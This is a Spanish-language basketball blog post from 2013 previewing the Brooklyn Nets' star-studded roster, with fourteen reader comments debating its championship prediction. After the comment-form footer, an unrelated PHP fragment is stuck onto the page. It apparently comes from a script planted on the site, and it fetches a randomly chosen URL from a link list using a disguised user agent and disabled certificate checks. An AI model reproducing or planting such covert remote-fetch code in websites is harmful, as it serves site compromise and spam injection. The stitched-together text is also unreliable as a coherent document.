Brooklyn Nets: Jaque al rey

17 de October de 2013 por Viva_Dirk

Os presento al equipo más caro de la competición. El quinteto titular que dirigirá Jason Kidd cobrará más que el 80% de las plantillas de la liga. Semejante dato nos ha de hacer pensar en un súper equipo y así lo parece sobre el papel. Todos los movimientos de los Nets han ido encaminados a mejorar de forma inmediata el equipo sin importar nada el dinero ni el medio/largo plazo. El único objetivo es el anillo. Al equipo que alcanzó la cuarta plaza de la conferencia con 49 victorias liderado por Deron Williams y Brook Lopez se le han sumado piezas por doquier, a cada cual mejor… y más veterana. Como hemos comentando anteriormente, a los mandos se ha puesto Jason Kidd que el año pasado estaba jugando a buen nivel en la liga. Despierta una gran expectación su relación con unos jugadores que han sido sus rivales durante casi toda su carrera.

El quinteto es el mejor de la competición, la plantilla la más completa, tienen un propietario que no escatima en gastos… Todo para poner en jaque al rey. ¿Será jaque mate?

El puesto de base es para el jugador que por salario y momento de carrera en el que se encuentra debería ser el jugador franquicia. Cerca de cumplir los 30 años, Deron Williams se encuentra ante su gran oportunidad. Desde muy pronto fue considerado como uno de los mejores bases de la competición y se convirtió en el favorito de muchos a pesar de no haber llegado a ninguna cota colectiva reseñable. Sin embargo, los últimos años ha perdido reconocimiento tanto del público como de la liga por la llegada de un puñado de bases de primer nivel. Este año debemos ver al mejor Deron de todos, al del caudal ofensivo casi infinito que ya conocemos pero también al jugador capaz de comandar una nave llena de jugadores que viven para ganar. Si no le vemos este año ejerciendo de líder no le veremos nunca. Para cubrir los 10 minutos que deje Deron ha llegado un Shaun Livingston que tras su gravísima lesión de 2007 se ha reciclado en un buen base suplente. Buen organizador ofensivo, con un rango de tiro limitado, en defensa sufre contra bases pequeños muy físicos pero da la talla contra bases de más tamaño. Si Livingston no da el nivel Jason Terry podría ocupar esta posición. 

Joe Johnson partirá como escolta titular. El mega contrato que firmó años atrás no debe cegarnos respecto a las virtudes de este dandy de las pistas. Al igual que Deron es muy difícil que se vea en otra como esta y después de años jugando playoffs sin más aspiración que pasar alguna ronda debería dejarse la piel por este proyecto. De él se espera que haga llegar el balón con ventaja a los hombres grandes pero sobretodo que abra el campo. El 37% que promedia en triples durante su carrera no me parecerá suficiente este año ya que dispondrá de más tiros abiertos que nunca. La única exigencia que no entra dentro de su naturaleza y que deberá asumir será la de defender fuerte. Veremos si puede. También nos gustaría saber si Paul Pierce le habrá perdonado lo que le hizo el año pasado. Por su parte, Jason Terry será uno de los líderes de la segunda unidad, rol en el que durante años ha sido de los mejores de la liga. Su papel será más que nunca el de prender fuego a las redes a base de triples y levantar al público de Brooklyn nada más salir al campo.

Paul Pierce jugará por primera vez sin la camiseta verde de los Celtics, algo a lo que nos costará acostumbrarnos y que solo estará justificado si consigue ponerse un segundo anillo en su mano. No vamos a presentar unas virtudes de sobra conocidas. Jugador letal donde los haya, llegado el momento le tocará bailar con la más fea porque, si de algo carece esta plantilla, es de esos supuestos ‘anti-Lebrones’. En este sentido Pierce nunca ha rehuido la responsabilidad. Si sus piernas lo permiten puede dar minutos de buena defensa en playoffs. El resto lo damos por hecho ya que rara vez ha fallado. Durante la liga regular tanto Alan Anderson como Andrei Kirilenko disfrutarán de minutos en esta posición. También Gary Forbes podría unirse a la acción.

En el puesto de ala-pívot Kevin Garnett no será, por primera vez en su carrera, la referencia interior del equipo, ni falta que le hace. En Brooklyn esperan que impregne de su carácter ganador hasta al de los puestos de los perritos. Llegados los playoffs, Garnett debe convertirse en el bastión defensivo del equipo y dar trabajo atrás a las jóvenes estrellas que se crucen en su camino. Para ello quizá le veamos en pista poco más de 25 minutos de media durante la regular season, ya que con Kirilenko, Evans, Blatche y Teletovic tiene las espaldas más que cubiertas. Andrei Kirilenko es el teórico sexto hombre del equipo. Ha firmado un contrato muy a la baja para jugar aquí y si puede desarrollar toda su versatilidad será una pieza clave. Reggie Evans seguirá aportando rebotes y mala leche para aburrir bajo los aros, mientras que Andray Blatche dejará tras de si chorros de talento siempre que le apetezca jugar. A Mirza Teletovic le darán ganas de volverse a Europa.

El máximo beneficiado de la llegada todos estos veteranos que ya no tienen interés alguno en hacer números es Brook Lopez. Desde el base hasta su compañero en la pintura, todos sus compañeros son excelentes pasadores, tienen un rango de tiro muy amplio y pueden superar a su defensor a base de recursos ofensivos, lo que deja a Brook con mucho mucho espacio en la zona. Hacer dobles ayudas sobre él sería casi un suicidio y son muy pocos los centers que pueden pararlo en el uno contra uno. El único center puro del que disponen para suplirle es el rookie Mason Plumlee, aunque con la posibilidad de desplazar a Garnett a dicho puesto no contará con excesivos minutos.

Y en el banco reside la gran incógnita de este macro proyecto. No tenemos la menor idea de que libreto maneja Jason Kidd pero visto el potencial ofensivo del que dispone, su mayor responsabilidad será mantener un buen nivel defensivo en la pista y saber gestionar los minutos durante la temporada regular de todos los veteranos para llegar al 100% a playoffs sin que el número de victorias se resienta.

Quinteto inicial: Deron Williams – Joe Johnson – Paul Pierce – Kevin Garnett – Brook López
Sexto hombre: Andrei Kirilenko

Pronóstico: Mas de 60 victorias y jaque mate. Campeones.

Comenta

14 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Superequipo,titulares de nivel y un banquillo de aupa,con una profundidad amplísima.Supongo que Kidd no será tan inepto como para no desarrollar tácticas de juego.Ha sido base y supongo que será capaz de trasladar sus conocimientos al banquillo.Me preocupa más la gestión de roles/egos aunque ha sido una gran estrella y tendrá a favor que los dinosaurios de la plantilla querrán estar frescos para PO así que no tendrán problemas en hacerse a un lado cuando llegue el mínimo cansancio.

    No sé,a pesar de los muchos cambios no veo motivos para que fallen…para mí su rango de objetivos va desde caer en semifinales del este en el séptimo hasta conseguir el anillo(por el dinero invertido es evidente que se exige el anillo pero todos sabemos como va esto),clasificando entre los 4 primeros y por encima de los Knicks.Menos que eso habrá sido un fracaso absoluto,más que el según los entendidos protagonizaron el Big 3 de Miami al caer ante Dallas.

      Citar

  2. Nacho dice:
    #2

    Yo me imagino a LeBron jugando y sufriendo contra Pierce, y cuando se cansa éste, le sale Kirilenko. A Spoesltra tejiendo la red para que J.J. no enchufe una, y sale Terry para inflarse a triples. Uffff, y muchas más… tiene tantas posibilidades el equipo, que asusta. Si Kidd da con la tecla, los veteranos enganchan y Deron se cree a sí mismo será el campeón, pero son varios “y si…”

      Citar

  3. Blade Petrovic dice:
    #3

    Por curiosidad, podrían los nets cortar a alguien(ej Teletovic) y contratar al antilebron por antomasia, DeShawn Stevenson?

      Citar

  4. Simon dice:
    #4

    Excelente Viva. En serio no puedo estar mas de acuerdo con todo lo expuesto. Me alegra que hayas mentado el caso de JoJo… un jugador que muchos desprecian por el hecho de cobrar el máximo como si el tuviera culpa de ello.
    Al principio yo no era muy optimista con este equipo… pero cuanto mas pienso en ellos más los veo con verdaderas opciones de ser campeones… Es que Pierce y Garnett van a dar un plus impresionante. Deron y Lopez van a estar mucho mas liberados lo que les vendrá de perlas… y JoJo ya no tendrá esa presión de estar todo el mundo pidiendole que haga cosas que no ha hecho nunca y se podrá dedicar a anotar sus tiros. Es que los 5 jugadores titulares son tios muy inteligentes que no deberían tener problemas para acoplarse… si acaso por sacarle un defecto creo que es un equipo un poco lento, Pierce, Garnett y JoJo deben de ser de los tios mas lentos en su posicion de la NBA pero esto lo suplen con otras cualidades.
    PEro si el quinteto no es suficiente miras al banco y es también un banco impresionante. Un base suplente correcto como Livingston. Un anotador que aunque venido a menos dará sus noches de gloria aún. Un crack como Kirilenko capaz de hacer de todo y por si fuera poco tienen a un tio muy capaz como Alan Anderson para completar minutos de aqui y de allá…
    Y si nos metemos dentro es que lo tienen todo. titulares que se compenetran a la perfección. Un tio super intenso y fajador como Evans. Un talentazo como Blatche para hacer un poco de todo. Y un tio como Teletovic que aunque no tiene oportunidades es un jugadorazo y un tio al que no le va a temblar el pulso si algún dia tiene que hacer de parche.

      Citar

  5. rumbero dice:
    #5

    Yo tengo ganas de ver que es capaz de hacer Kidd con este pedazo de plantilla. Por nombres son la leche, pero ya el año pasado era un buen equipo y no jugaban a casi nada. Ritmo lentísimo y a ver si entre Lopez y Johnson solventaban el asunto. Entiendo que con Jason a los mandos y con tanta incorporación la cosa debe cambiar y convertir a los Nets en un equipo con muchas más variantes. Creo que ahí Kirilenko va a ser una pieza fundamental. Y confío también en el impacto de Garnett a nível de competitividad y en la parcela defensiva. Debe ser el alma de estos Nets.

    Por otro lado es un equipo que debe funcionar desde ya. Pierce, Garnett, Johnson, Terry son muy buenos pero seguramente ya han tocado techo y el proyecto está montado para ganar el anillo esta temporada o la siguiente. Demasiados ojos pendientes de ellos con la presión que eso conlleva. La verdad es que no se si darles primera ronda o finales de conferencia. Como dice Nacho, muchos “if…”

      Citar

  6. Sancho88 dice:
    #6

    Pues yo sigo viendo mejor a los Pacers, que quereis que os diga. La final para mí es Miami-Indiana y los Nets caerán en semifinales. Deron no vale para liderar a ningún equipo campeón. Como decís, muchos egos juntos y un novato en el banquillo. Se lo van a comer. En este equipo terminará habiendo movidas tarde o temprano

      Citar

  7. Luis H. dice:
    #7

    Tíos con la vida deportiva y económica solucionada como Paul Pierce o Kevin Garnett no cambian de equipo si no es para ir a por el anillo. Y creo que Deron y Brook López van a estar por la labor. No te quiero contar en caso de los suplentes. Tienen defensa, un clutch player como Pierce, muchas opciones distintas y la ciudad y el barrio exigen compromiso; no es una franquicia cualquiera en la liga. Semifinales del Este seguro y creo que pueden dar serio disgusto al que se encuentren por el camino

      Citar

  8. Luis H. dice:
    #8

    Por cierto, el otro día vi un resumen del partido de pretemporada ante Boston, creo. Me sorprendió el buen momento físico de Shaun Livingston. Siempre fue liviano, pero no le había visto moverse así desde su lesión

      Citar

  9. Aicarg dice:
    #9

    Equipazo que puede optar al anillo si le acompaña un poco la suerte (pocas lesiones propias o algunas en los equipos rivales del este).

    Equipo bonito de ver este año.

    Saludos

      Citar

  10. Denise dice:
    #10

    Pues yo no estoy de acuerdo en el pronostico.
    Los Nets tienen un plantillón y un equipo superprofundo. De eso no hay dudas, pero tengo muchas dudas.
    Primero, Jason Kidd de entrenador, bfff un tio tan joven y visceral, se corre el riesgo de que los jugadores lo vean mas como un jugador mas y un compañero de juergas que como un entrenador. Despues habrá que ver los conceptos tacticos que tiene Kidd, que el hecho de que alguien sea bueno jugando no es sinonimo de que sean buenos liderando a un grupo de gente, es más, si repasamos muchos deportes te encuentras autenticos mitos que luego han fracasado estrepitosamente como jugadores.
    Despues está el tema de los jugadores y la edad. Por nombre el equipo asusta, pero hoy en dia Lebron en playoffs se come a Paul Pierce cuando, donde y como quiera. Y al ex-celtico lo veo a dia de hoy muy inferior a otros aleros como Melo, George, e incluso que Deng.
    Con Garnett lo mismo, mucha experiencia, coraje y mucha mala leche es lo que le puede hacer mejorar su juego, porque ya está a años luz del jugador que fue.
    Y Deron y Jo-Jo los meto en esa categoria de jugadores mjuy buenos pero poco fiables para conducir a una franquicia al exito colectivo.
    Yo, mas que el quinteto, lo que creo que puede hacer que los Nets ganen el anillo es el banquillo. Con Terry, Kirilenko y Blatche haciendolo bien, Evans que sabes que siempre te va a aportar y a poco que Livingston y Anderson aporten, entonces si es un serio candidato al anillo porque en los 240 minutos, en las 5 posiciones va a haber intensidad. Si el banquillo no aporta mucho, no veo a los Nets llegando lejos, porque como digo los titulares sobre el papel son muy buenos pero a la hora de la verdad no lo son tanto.
    De momento, los meto por detras de Miami, Indiana y Chicago.

      Citar

  11. Viva_Dirk dice:
    #11

    Deng tiene que drogarse mucho para oler el nivel de Pierce. Y luego si, evidentemente esos aleros que dices son mejores individualmente que Pierce para jugar 82 partidos en la regular, pero en playoffs sin ningún problema físico ha sido de los que mejor ha peleado con LeBron, el resto aun tienen que hacer algo para ponerlos al mismo nivel de Pierce para ser decisivos en una eliminatoria.

    Con Garnett igual, no es el jugador que fue, pero sano todos los cuatros de la competición lo pasan mal contra el, en una eliminatoria a 7 partidos me quedo con el por delante de Bosh, Boozer, West o Ibaka.

    Claro es que si estos 2 fueran los de hace 5 años igual el resto de equipos pedia un reset de la liga, jeje.

      Citar

  12. rumbero dice:
    #12

    Viva_Dirk:
    Deng tiene que drogarse mucho para oler el nivel de Pierce. Y luego si, evidentemente esos aleros que dices son mejores individualmente que Pierce para jugar 82 partidos en la regular, pero en playoffs sin ningún problema físico ha sido de los que mejor ha peleado con LeBron, el resto aun tienen que hacer algo para ponerlos al mismo nivel de Pierce para ser decisivos en una eliminatoria.

    Con Garnett igual, no es el jugador que fue, pero sano todos los cuatros de la competición lo pasan mal contra el, en una eliminatoria a 7 partidos me quedo con el por delante de Bosh, Boozer, West o Ibaka.

    Claro es que si estos 2 fueran los de hace 5 años igual el resto de equipos pedia un reset de la liga, jeje.

    El tema es ese. Si llegan todos sanos y bien de forma a PO le pueden pintar la cara a cualquiera. El problema que le veo es que dosificando demasiado en regular y sabiendo que las 4 primeras plazas del este van a estar caras se pueden encontrar con que sus primeros cruces sean por ejemplo Knicks y Miami, y eso es cosa seria por muy bien que lleguen. Pero vaya, para eso tienen un roster tan profundo.

    PD: Aunque pensándolo mejor, ¿igual el mejor encontrarse con Miami en primera ronda, cuando los Nets van a tener las piernas más frescas no? Entonces la táctica sería quedar octavos y a por ellos 😀

      Citar

  13. franitis dice:
    #13

    Vale que Pierce y KG no tienen 29 o 30 años (que para mí la edad tope de madurez+condiciones físicas de un profesional de la NBA), pero el año pasado con los Celtics tuvieron algo que puede aportar a los Nets una ventaja competitiva clara, y es el “clutch” que te aportan. Estos dos te resuelven un partido en el último cuarto sin que les tiemble la muñeca ni un momento y con la regularidad que no te aporta Deron Williams.

    El ejemplo más claro está en las finales que se marca el Sr. Ray Allen decantando partidos en los instantes finales a base de canastas decisivas…

    La única duda que me aporta este equipo es el orden de preferencia a la hora de tirar. ¿Cuál es la primera, segunda, tercera opción? Deron, JoJo, Pierce, KG y López… ¿Para quién jugar? Difícil para un recién llegado Kidd.

      Citar

  14. r_miller dice:
    #14

    Yo creo que la primera opcion van a ser: Deron y Lopez, Joe y Pierce se van a limitar a unos 10/15 tiros por partido y Garnett se va a hinchar a defender y rebotear, pero a tirar no mucho.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>